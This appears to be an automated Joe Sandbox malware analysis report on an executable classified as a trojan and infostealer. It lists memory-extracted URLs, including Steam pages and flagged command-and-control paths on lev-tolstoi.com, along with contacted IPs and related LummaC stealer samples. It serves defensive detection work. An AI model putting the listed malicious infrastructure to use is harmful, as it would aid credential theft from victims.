                                                                                                                    https://sketchfab.comMaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://www.ecosia.org/newtab/MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://lv.queniujq.cnMaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://steamcommunity.com/profiles/76561199724331900/inventory/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brMaZjv5XeQi.exe, 00000000.00000003.2182887020.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.youtube.com/MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://store.steampowered.com/privacy_agreement/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://cdn.fastly.(MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.google.com/recaptcha/MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://checkout.steampowered.com/MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refMaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://lev-tolstoi.com/apixIMaZjv5XeQi.exe, 00000000.00000003.2233712383.0000000000FFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            		unknown
                                                                                                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477MaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://lev-tolstoi.com/apih3MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                              		unknown
                                                                                                                                              https://store.steampowered.com/about/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://steamcommunity.com/my/wishlist/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://checkout.steampowMaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://help.steampowered.com/en/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://steamcommunity.com/market/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://store.steampowered.com/news/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiMaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://lev-tolstoi.com/MSWznTY69wwRW38B95MaZjv5XeQi.exe, 00000000.00000003.2233252191.00000000057B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                            		unknown
                                                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://store.steampowered.com/subscriber_agreement/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133421540.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133421540.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://lev-tolstoi.com/MSWznTY69wwRW38B95-MaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2182870338.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2207101478.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2181402365.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2206927029.00000000057AC000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2206818863.00000000057AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://lev-tolstoi.com/V4MaZjv5XeQi.exe, 00000000.00000002.2288412972.0000000000F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://recaptcha.net/recaptcha/;MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://lev-tolstoi.com/piy7MaZjv5XeQi.exe, 00000000.00000003.2256416712.0000000000FE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://lev-tolstoi.com/apisMaZjv5XeQi.exe, 00000000.00000003.2286706213.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000002.2288722438.0000000000FFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://login.steampMaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://steamcommunity.com/discussions/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://community.fMaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://store.steampowered.com/stats/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://medal.tvMaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://store.steampowered.com/steam_refunds/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://x1.c.lencr.org/0MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://x1.i.lencr.org/0MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchMaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://lev-tolstoi.com/WCMaZjv5XeQi.exe, 00000000.00000003.2207101478.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2206927029.00000000057AC000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2206818863.00000000057AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=eMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://steamcommunity.com/workshop/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://login.steampowered.com/MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://support.mozilla.org/products/firefoxgro.allMaZjv5XeQi.exe, 00000000.00000003.2182887020.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cMaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://store.steampowered.com/legal/MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133421540.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high

                                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                            Public IPs

                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                            104.21.66.86
                                                                                                                                                                                                            		lev-tolstoi.comUnited States
                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                            172.67.157.254
                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                            		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                            104.102.49.254
                                                                                                                                                                                                            		steamcommunity.comUnited States
                                                                                                                                                                                                            		16625AKAMAI-ASUSfalse

                                                                                                                                                                                                            General Information

                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                            Analysis ID:1580922
                                                                                                                                                                                                            Start date and time:2024-12-26 13:13:20 +01:00
                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                            Overall analysis duration:0h 6m 1s
                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                            Number of analysed new started processes analysed:4
                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                            Sample name:MaZjv5XeQi.exe
                                                                                                                                                                                                            renamed because original name is a hash value
                                                                                                                                                                                                            Original Sample Name:20460f73ddd6da12a34a1bc6911b0538.exe
                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@1/0@12/3
                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                            HCA Information:Failed
                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                            • VT rate limit hit for: MaZjv5XeQi.exe

                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                            07:14:10API Interceptor11x Sleep call for process: MaZjv5XeQi.exe modified

                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                            IPs

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                            • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                            172.67.157.254jT7sgjdTea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              Y4svWfRK1L.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                YKri2nEBWE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    SPFFah2O2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      4KDKJjRzm8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                                                                          6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            Ebgl8jb6CW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                                • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                                http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • www.valvesoftware.com/legal.htm

                                                                                                                                                                                                                                Domains

                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                lev-tolstoi.comjT7sgjdTea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                Y4svWfRK1L.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                YKri2nEBWE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                0c8cY5GOMh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                z3IxCpcpg4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                SPFFah2O2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                4KDKJjRzm8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                steamcommunity.comM7uF55qihK.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                jT7sgjdTea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                pTM2NWuTvC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                DjnwNMDQhC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                Y4svWfRK1L.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                YKri2nEBWE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                0c8cY5GOMh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                tFDKSN3TdH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                ghumRvJGY9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                z3IxCpcpg4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 23.55.153.106

                                                                                                                                                                                                                                ASNs

                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                CLOUDFLARENETUSjT7sgjdTea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                Y4svWfRK1L.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                YKri2nEBWE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                0c8cY5GOMh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 104.21.6.3
                                                                                                                                                                                                                                z3IxCpcpg4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                SPFFah2O2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                ZBbOXn0a3R.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                • 172.67.165.185
                                                                                                                                                                                                                                4KDKJjRzm8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                AKAMAI-ASUSM7uF55qihK.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                jT7sgjdTea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                pTM2NWuTvC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                DjnwNMDQhC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                Y4svWfRK1L.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                YKri2nEBWE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.102.49.254
